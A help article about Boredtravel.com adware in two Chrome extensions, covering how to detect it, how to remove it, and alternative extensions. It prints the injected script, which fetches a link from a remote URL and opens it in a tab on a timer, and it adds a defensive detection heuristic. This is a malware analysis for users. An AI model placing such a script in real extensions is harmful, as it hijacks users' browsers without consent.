Adware that opens pop-ups to Boredtravel.com has slipped into some Chrome extensions. Here's how to spot and remove this virus.
Identify and remove Boredtravel.com adware
A malicious script has been inserted in the latest update of several Chrome extensions. This script opens the site Boredtravel.com at regular intervals, without the user's knowledge. The infected extensions are Lyrics Fetcher and Remind Me, from the developer helpfulwebtech.
This adware is not dangerous in that it only opens an advertising page. It is nevertheless disturbing to let this dubious practice occur.
Identify the adware
To identify the adware, just analyze the behavior of your browser:
- Close Google Chrome and restart it.
- Wait 6 minutes after opening the browser. If your browser is infected, a tab will open on the boredtravel.com page after exactly 6 minutes. This will also happen every 4 hours.
Remove the adware
The removal is simple and fast:
- Check your Chrome extensions: If one or more of the extensions listed above are installed, then your browser is probably infected.
- To remove this adware, simply disable or remove the extensions in question.
Cases have been identified for the extensions Lyrics Fetcher and Remind Me, but they may not be the only ones. The adware may also be present in Baby Mode, an extension by the same developer.
It is unclear whether the developer of these extensions deliberately added the malicious script, or whether it was done by a hacker. As a precaution, we recommend that you disable or remove all extensions from this developer.
The extensions have been reported to Google; we will know more soon. If other extensions have the same problem, do not hesitate to let us know.
Replace extensions
Here are some alternative extensions:
- Lyrics Fetcher can be replaced by Lyrics Here by Rob W or Auto Lyric Show
- Remind Me can be replaced by Pi Reminder
How Boredtravel.com works
The principle is simple: the developer or a hacker has added a script to the affected extensions. This script, which runs in the background, instructs the browser to open an advertising page at regular intervals. The goal for the developer or hacker is for the landing page to be opened repeatedly, which increases the number of views of the site Boredtravel.com and the related income.
Here is the code that has been added in the extension. I added green comments so you can understand it better:
<script>
// function that opens a pop-up 6 minutes after Chrome starts
setTimeout(function () {
  $.ajax({
    url: "https://demo7530752.mockable.io/url",
    /* this URL generates a link such as
       https://ourshort.com/?g/BNHzHJJ */
    async: false,
    dataType: 'json',
    success: function (data) {
      // open the generated link, which then redirects to Boredtravel.com
      var newURL = data.msg;
      chrome.tabs.create({ url: newURL });
      intervalWebsite(); /* call the function that opens
                            a pop-up every 4 hours */
    }
  });
}, 6 * 60 * 1000); // 6 x 60 x 1000 milliseconds = 6 min
// function that opens a pop-up every 4 hours
function intervalWebsite() {
  setInterval(function () {
    $.ajax({
      url: "https://demo7530752.mockable.io/url",
      // same as in the first function
      async: false,
      dataType: 'json',
      success: function (data) {
        // same as in the first function
        var newURL = data.msg;
        chrome.tabs.create({ url: newURL });
      }
    });
  }, 240 * 60 * 1000); // 240 x 60 x 1000 milliseconds = 240 min = 4 h
}
</script>
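The script above combines three things: a timer, a request to a remote URL, and a tab opened on whatever that request returns. As an added example (not part of the original article or of any extension), the following Node.js sketch checks extension source text for that combination; the function and field names are hypothetical and both samples are constructed, the first one condensed from the listing above.

```javascript
// Added example, not from the article. Names are hypothetical; samples are constructed.
const TIMER_DELAY = /\}\s*,\s*((?:\d+\s*\*\s*)*\d+)\s*\)/g; // e.g. "}, 6 * 60 * 1000)"
const LITERAL_URL = /url\s*:\s*["'](https?:\/\/[^"']+)["']/g; // url: "https://..."
const REMOTE_FETCH = /\$\.ajax\s*\(|\bfetch\s*\(|XMLHttpRequest/;
const TIMER_CALL = /\bset(?:Timeout|Interval)\s*\(/;
// chrome.tabs.create({ url: someVariable }) - destination decided at run time
const TAB_FROM_VARIABLE = /chrome\.tabs\.create\(\s*\{\s*url\s*:\s*[A-Za-z_$][\w$.]*\s*\}/;

function analyzeExtensionScript(source) {
  // Strip block comments and whole-line comments so commented-out code is ignored.
  const code = source.replace(/\/\*[\s\S]*?\*\//g, "").replace(/^\s*\/\/.*$/gm, "");
  const timerDelaysMs = TIMER_CALL.test(code)
    ? [...code.matchAll(TIMER_DELAY)].map((m) =>
        m[1].split("*").reduce((product, n) => product * Number(n), 1))
    : [];
  const literalUrls = [...new Set([...code.matchAll(LITERAL_URL)].map((m) => m[1]))];
  const fetchesRemoteData = REMOTE_FETCH.test(code);
  const opensTabFromVariable = TAB_FROM_VARIABLE.test(code);
  return {
    timerDelaysMs, literalUrls, fetchesRemoteData, opensTabFromVariable,
    // All three together: a timer, a remote lookup, and a tab whose URL comes from data.
    suspicious: timerDelaysMs.length > 0 && fetchesRemoteData && opensTabFromVariable,
  };
}

// Constructed sample: the article's listing, condensed.
const LISTING_SAMPLE = `
setTimeout(function () {
  $.ajax({ url: "https://demo7530752.mockable.io/url", async: false, dataType: 'json',
    success: function (data) {
      var newURL = data.msg;
      chrome.tabs.create({ url: newURL });
      intervalWebsite();
    } });
}, 6 * 60 * 1000);
function intervalWebsite() {
  setInterval(function () {
    $.ajax({ url: "https://demo7530752.mockable.io/url", async: false, dataType: 'json',
      success: function (data) { chrome.tabs.create({ url: data.msg }); } });
  }, 240 * 60 * 1000);
}`;

// Constructed benign sample: a timer that opens a fixed, hard-coded page.
const BENIGN_SAMPLE = `
// open the help page after 10 minutes
setTimeout(function () {
  chrome.tabs.create({ url: "https://example.com/help" });
}, 10 * 60 * 1000);`;
console.log(analyzeExtensionScript(LISTING_SAMPLE), analyzeExtensionScript(BENIGN_SAMPLE));
```

The same function can be run over the text of each script file of an installed extension. A match is a reason to read that file, not proof of adware, since the check is only a pattern heuristic.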
Sources: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/
I have this problem but I do not know any of the extensions you mentioned.